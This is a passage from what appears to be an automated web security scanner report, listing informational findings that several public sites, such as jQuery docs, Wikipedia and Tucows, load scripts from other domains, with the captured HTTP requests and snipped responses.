HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:02 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.58. http://docs.jquery.com/UI/Datepicker  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Datepicker

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Datepicker HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:03 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 95300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.59. http://docs.jquery.com/UI/Dialog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Dialog

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Dialog HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:05 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.60. http://docs.jquery.com/UI/Effects/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Effects/ HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:47:46 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.61. http://docs.jquery.com/UI/Effects/Slide  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Slide

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Effects/Slide HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:47:46 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.62. http://docs.jquery.com/UI/Menu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Menu

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Menu HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:02 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.63. http://docs.jquery.com/UI/Progressbar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Progressbar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Progressbar HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:05 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.64. http://docs.jquery.com/UI/Resizable  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Resizable

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Resizable HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:06 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.65. http://docs.jquery.com/UI/Selectable  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Selectable

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Selectable HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:07 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.66. http://docs.jquery.com/UI/Slider  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Slider

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Slider HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:07 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.67. http://docs.jquery.com/UI/Tabs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Tabs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Tabs HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:07 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.68. http://docs.jquery.com/UI/Theming/API  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Theming/API

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Theming/API HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:01 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.69. http://dojotoolkit.org/community/licensing.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dojotoolkit.org
Path:   /community/licensing.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/licensing.shtml HTTP/1.1
Host: dojotoolkit.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 18:04:29 GMT
Server: Apache/2.2.4 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Vary: Accept-Encoding,User-Agent
Content-Length: 3352
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <style type="text/css">
           @import "/js/dojo/1.5/dijit/themes/claro/claro.css";
       </style>
   
...[SNIP]...
</p>
<script src="http://www.google.com/jsapi?key=ABQIAAAAbTW5DVaTIHKHQe5Q75sB0BSaOaO_TgJ5c3mtQFnk5JO2zD5dZBSGHlRJ8HAPlCQCEO_FxSmyNAHSLw" type="text/javascript"></script>
...[SNIP]...

19.70. http://domainhelp.tucows.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://domainhelp.tucows.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: domainhelp.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:09 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
X-Pingback: http://www.tucowsdomains.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<link rel='stylesheet' id='contact-form-7-css' href='http://www.tucowsdomains.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.2' type='text/css' media='all' />
<script type='text/javascript' src='http://www.tucowsdomains.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://api.recaptcha.net/js/recaptcha_ajax.js?ver=3.0.2'></script>
<script type='text/javascript' src='http://www.tucowsdomains.com/wp-content/themes/tucowsdomains/js/domains.js?ver=1.1'></script>
...[SNIP]...
<!-- end wrapper -->
       <script type="text/javascript" src="http://www.tucowsdomains.com/wp-content/themes/tucowsdomains/js/browserDetect.js"></script>
       <script type="text/javascript" src="http://www.tucowsdomains.com/wp-content/themes/tucowsdomains/js/jquery-ui-1.8.2.custom.min.js"></script>
       <script type="text/javascript" src="http://www.tucowsdomains.com/wp-content/themes/tucowsdomains/js/nice.js"></script>
       <script type="text/javascript" src="http://www.tucowsdomains.com/wp-content/themes/tucowsdomains/js/jquery.autocomplete.js"></script>
       <script type="text/javascript" src="http://www.tucowsdomains.com/wp-content/themes/tucowsdomains/js/localdata.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://www.tucowsdomains.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.47'></script>
<script type='text/javascript' src='http://www.tucowsdomains.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.2'></script>

<!-- Reinvigorate WordPress Plugin -->
<script type="text/javascript" src="http://include.reinvigorate.net/re_.js"></script>
...[SNIP]...

19.71. http://domainhelp.tucows.com/domains/whois/whoislookup/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://domainhelp.tucows.com
Path:   /domains/whois/whoislookup/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /domains/whois/whoislookup/ HTTP/1.1
Host: domainhelp.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:09 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
X-Pingback: http://www.tucowsdomains.com/xmlrpc.php
Link: <http://www.tucowsdomains.com/?p=550>; rel=shortlink
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<link rel='stylesheet' id='contact-form-7-css' href='http://www.tucowsdomains.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.2' type='text/css' media='all' />
<script type='text/javascript' src='http://www.tucowsdomains.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://api.recaptcha.net/js/recaptcha_ajax.js?ver=3.0.2'></script>
<script type='text/javascript' src='http://www.tucowsdomains.com/wp-content/themes/tucowsdomains/js/domains.js?ver=1.1'></script>
...[SNIP]...
<!-- end wrapper -->
       <script type="text/javascript" src="http://www.tucowsdomains.com/wp-content/themes/tucowsdomains/js/browserDetect.js"></script>
       <script type="text/javascript" src="http://www.tucowsdomains.com/wp-content/themes/tucowsdomains/js/jquery-ui-1.8.2.custom.min.js"></script>
       <script type="text/javascript" src="http://www.tucowsdomains.com/wp-content/themes/tucowsdomains/js/nice.js"></script>
       <script type="text/javascript" src="http://www.tucowsdomains.com/wp-content/themes/tucowsdomains/js/jquery.autocomplete.js"></script>
       <script type="text/javascript" src="http://www.tucowsdomains.com/wp-content/themes/tucowsdomains/js/localdata.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://www.tucowsdomains.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.47'></script>
<script type='text/javascript' src='http://www.tucowsdomains.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.2'></script>

<!-- Reinvigorate WordPress Plugin -->
<script type="text/javascript" src="http://include.reinvigorate.net/re_.js"></script>
...[SNIP]...

19.72. http://download.cnet.com/SmartDraw-2010/3000-2075_4-10002466.html/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /SmartDraw-2010/3000-2075_4-10002466.html/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /SmartDraw-2010/3000-2075_4-10002466.html/x22 HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:15 GMT
Server: Apache/2.2
Vary: User-Agent,Host
Accept-Ranges: bytes
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=920
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 23096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<!-- Vader loves you -->
<head>

...[SNIP]...
<link type="text/css" rel="stylesheet" rev="stylesheet" href="http://i.i.com.com/cnwk.1d/css/rb/tron/download/default.css"/>
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" rev="stylesheet" href="http://i.i.com.com/cnwk.1d/css/rb/tron/reviews/default.css"/>
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/commerce/commerce.tron.dfll.compressed.js"></script>
...[SNIP]...
<!-- MAC ad -->

   <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
<!-- REVENUE SCIENCE -->
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/js/rsi/dm_client_CNET.js"></script>
...[SNIP]...

19.73. http://echealthinsurance.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://echealthinsurance.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: echealthinsurance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:26:32 GMT
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Last-Modified: Thu, 27 Jan 2011 16:19:12 GMT
ETag: "2ab000000000a29-93b4-49ad64f67546e"
Accept-Ranges: bytes
Content-Length: 37812
Cache-Control: max-age=300, must-revalidate
Expires: Thu, 03 Feb 2011 20:31:32 GMT
Vary: Accept-Encoding,Cookie
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<p><script src="http://www.healthcarecreatives.com/scripts/jsgeo.php" type="text/javascript"></script>
...[SNIP]...

19.74. http://en.wikipedia.org/wiki/Associated_Broadcasting_Company/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/Associated_Broadcasting_Company/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wiki/Associated_Broadcasting_Company/x22 HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:30:47 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Content-Length: 21391
Content-Type: text/html; charset=UTF-8
Age: 90
X-Cache: HIT from sq71.wikimedia.org
X-Cache-Lookup: HIT from sq71.wikimedia.org:3128
X-Cache: MISS from sq35.wikimedia.org
X-Cache-Lookup: MISS from sq35.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19" type="text/javascript"></script>
<script type="text/javascript" src="http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

19.75. http://en.wikipedia.org/wiki/SmartDraw/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/SmartDraw/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wiki/SmartDraw/x22 HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:30:48 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Content-Length: 20555
Content-Type: text/html; charset=UTF-8
Age: 89
X-Cache: HIT from sq73.wikimedia.org
X-Cache-Lookup: HIT from sq73.wikimedia.org:3128
X-Cache: MISS from sq34.wikimedia.org
X-Cache-Lookup: MISS from sq34.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19" type="text/javascript"></script>
<script type="text/javascript" src="http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

19.76. http://forums.digitalpoint.com/showthread.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.digitalpoint.com
Path:   /showthread.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1
Host: forums.digitalpoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:20 GMT
Server: Apache
Set-Cookie: bb_lastvisit=1296765140; expires=Fri, 03-Feb-2012 20:32:20 GMT; path=/; domain=.digitalpoint.com
Set-Cookie: bb_lastactivity=0; expires=Fri, 03-Feb-2012 20:32:20 GMT; path=/; domain=.digitalpoint.com
